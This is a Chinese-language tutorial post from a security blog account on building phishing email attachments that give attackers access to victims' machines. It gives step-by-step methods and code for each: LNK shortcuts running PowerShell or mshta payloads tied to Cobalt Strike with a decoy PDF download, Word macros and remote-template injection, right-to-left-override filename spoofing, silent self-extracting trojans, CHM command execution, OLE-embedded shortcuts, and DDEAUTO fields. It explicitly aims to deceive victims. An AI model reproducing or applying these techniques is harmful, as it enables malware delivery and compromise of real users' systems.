查看原文
其他

邮箱附件钓鱼常用技法

Yokan Z2O安全攻防 2023-01-06

免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。


文章正文

INK

lnk⽂件,简单理解为快捷⽅式,创建⽅式如下:

下图为calc.exe的快捷⽅式的属性信息,我们可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令:


然后运行,即可在CS上线。

⽽在实施钓⻥过程中,对于我们的calc.exe的快捷⽅式来说,⼀个⼤⼤的计算机ico图标,显然看起来不像⼀个好玩意,因此可以尝试在“属性”中去更改该⽂件的图标:

但是⽤系统⾃带的ico去做⽂件图标替换的话,有个弊端,即当替换的ico在⽬标机器上不存在时,就会出现类似空⽩ico图标:


比较好的方法是修改lnk的icon_location标志位,修改为相关后缀,系统即可⾃动联想到对应的打开⽅式:

用winhex或者010 Editor打开该LNK文件,找到String Data部分ICON_LOCATION字符串:

我们要将其修改为.\1.pdf(Unicode),其长度0x07:

07002E005C0031002E00700064006600

我的pdf默认是由edge浏览器打开,则在icon_location中设置为pdf后缀时,⽂件的ico也会自动显示为edge浏览器打开的图标, 这样可以达到⾃适配的效果:


当受害者中招打开我们的所谓的pdf,实则为恶意的快捷⽅式时,双击两下,什么反应都没有,可能会有⼀丝疑惑,因此可以当尝试⽤powershell、mshta等⽅式上线时,我们可以更改如cobaltstrike⽣成的代码,加上⼀段⾃动下载打开⼀份真的pdf,来达到逼真的效果,具体过程如下:


首先新建一指向%windir%\System32\mshta.exe的快捷方式(文件名尽量带有迷惑性),并更改其图标为%SystemRoot%\System32\SHELL32.dll中任意一个:



使用CS生成一个powershell方式的HTA木马


打开hta文件,在其执行payload前增加如下 语句:

Dim open_pdfSet open_pdf = CreateObject("Wscript.Shell")open_pdf.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.50.15:8000/1.pdf',$env:temp+'\1.pdf');Start-Process $env:temp'\1.pdf'", 0, true


然后python起个http服务

这样一来,在受害者打开LNK文件后会从远程下载一正常PDF文档并打开。


接下来使用上面的方法修改快捷方式图标为pdf的图标。


使用CS设置HTA文件下载:


之后更改快捷方式的参数为HTA下载地址:


之后双击该LNK文件,主机便会上线,而受害者会看到一正常的PDF文档:




CS


生成office宏病毒文件,此程序包生成一个VBA宏,您可以将其嵌入到Microsoft Word或Excel文档中。此攻击适用于Windows上的x86和x64 Office


在word的视图功能中植⼊相关宏:

随便创建一个宏,将CS的Macro代码复制进去保存就可以。运行,word即可上线。(excel类似)

但是此种办法有个弊端,就是宏代码是存在本地的,极易被杀软查杀。

远程模板注入宏代码

因此我们可以尝试使⽤远程加载模板的⽅式在进⾏宏加载。

原理:

利用Word文档加载附加模板时的缺陷所发起的恶意请求,而达到的攻击目的,所以当目标用户点开攻击者发送的恶意Word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。

发送的文档本身不带恶意代码,所以能过很多静态检测。只需要在远程DOTM文档中编写宏病毒或者木马即可。


思路:

编写一个带有宏代码的DOTM文档,上传服务器

编写一个带模板的DOCX文档

将该文档压缩找到并更改settings.xml.rels文件中的内容,将其中的target内容修改为服务器上DOTM文档的URL

将DOCX解压后的内容再以存储模式压缩为ZIP

修改后缀名为DOCX,打开后即可实现远程注入宏文档

新建word, 打开宏代码编辑环境后,在本文档的ThisDocument下,编写如下宏代码

保存时保存类型为 dotm :


开启Web服务,放在其目录下, http://192.168.111.234/cs_macro.dotm


制作 docx

创建一个简历模板word文档:


将word文件后缀 docx 改为 zip,解压,找到settings.xml.rels

用文本编辑器打开,修改target项,可用的协议有ftp、smb、http,这里使用http:

将 target 内容改为http://192.168.111.234/cs_macro.dotm


之后全选目录所有文件,压缩为macro_test.zip,再将后缀改为docx


制作完成。


双击打开,启动宏,即可上线:



文件名反转RLO

RLO,即Right-to-Left Override,我们可以在⽂件名中插⼊此类unicode字符,来达到⽂件名反转的效果。

以calc.exe来举例,

将其重命名为calcgpj.exe,然后在 calc 与 g 之间右键,看图操作


ok,此时已经变成了 以 jpg 结尾的了。但是双击运行还是 exe 格式运行的。


再利用ResourceHacker修改图标。

找个图片转换为 ico 格式。

http://www.bitbug.net/

如图,双击实际上还是运行的calc。


自解压

首先我们需要准备好木马(cmd.exe)、正常程序(calc.exe)


  1. 选中两个程序,然后添加到压缩文件,创建自解压


2.高级自解压选项,常规:解压路径 ——> 绝对路径:

路径写C:\windows\temp


3.高级自解压选项->设置

C:\windows\temp\选中的木马名

C:\windows\temp\选中的程序名


4.高级自解压选项->模式

静默模式->隐藏所有


5.高级自解压选项->更新

更新模式->解压并更新

覆盖模式->覆盖所有文件


6.确定

执行一下,发现达到了效果,在这里我们还需要做一些细节的伪装.

使用Resource Hacker换一下图标:


运行


自解压+RLO

  1. 将png图片和muma.exe自解压成 gnp.exe

  2. RLO,文件名反转成 exe.png

  3. 修改exe.png图标,变成个图片

  4. 运行,看起来是个图⽚,后缀也是个图⽚,打开也是个图⽚,但是木马成功执行

双击,pikaexe.jpg



CHM 电子书

CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。

制作CHM需要用到一个工具 EasyCHM(http://www.etextwizard.com/)


新建一个html文件,编码格式ANSI,向里面写入如下内容

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',cmd.exe,/c calc.exe'>

//这一排用于执行命令,注意cmd.exe前后都有,或者<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>也行

<PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

用easychm,新建-浏览-选择html文件所在目录-编译

生成一个chm,双击,打开了计算器


office OLE+LNK

核心目标是创建一个内嵌的lnk文件诱导用户点击,从而执行命令。word,excel都能使用


我们创建一个快捷方式如下

其目标处填写的是

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc

然后打开word文件,插入对象,选择package,为了更加逼真勾选显示为图标,然后可以更改图标,我们在更改图标处选择一个迷惑性比较大的图标


然后进入创建软件包界面,选择我们刚刚创建的lnk文件,写好卷标名,然后就把软件包插入到word界面了,只要用户点击该软件包并选择执行,则会执行我们在lnk中定义的代码



捆绑文件

K8免杀系统自带捆绑器加强版V2.0.EXE

超级文件捆绑器

生成,执行之后会执行cmd.exe一样的效果,但此时后门软件也被执行了。


Word DDE

在word文件里,输入 ctrl+F9,进入到域代码编辑。我们可以键入以下代码使文件在被打开时执行系统命令(word2019复现未成功,word2016成功,似乎是word版本问题
这个蛮实用的,目前众多word是默认禁用宏的,dde只需要用户点击两个按钮即可执行,实用性比宏好

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

随后在打开该文件时会出现两个对话框,全点是就会执行以上命令了


福利





【腾讯云】境外1核2G服务器低至2折,半价续费券限量免费领取!

https://curl.qcloud.com/MSIFpJMg



技术交流





交流群



关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。




知识星球



星球不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全等



往期文章:





Postgresql 渗透总结
一篇文章让你拿下用友nc
一篇文章带你学会容器逃逸
PHP代码审计系列(一) 基础:方法、思路、流程
spring cloud function spel表达式注入RCE复现
利用burp精准定位攻击者
从此 Typora 代码块有了颜色
不会写免杀也能轻松过defender上线CS


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存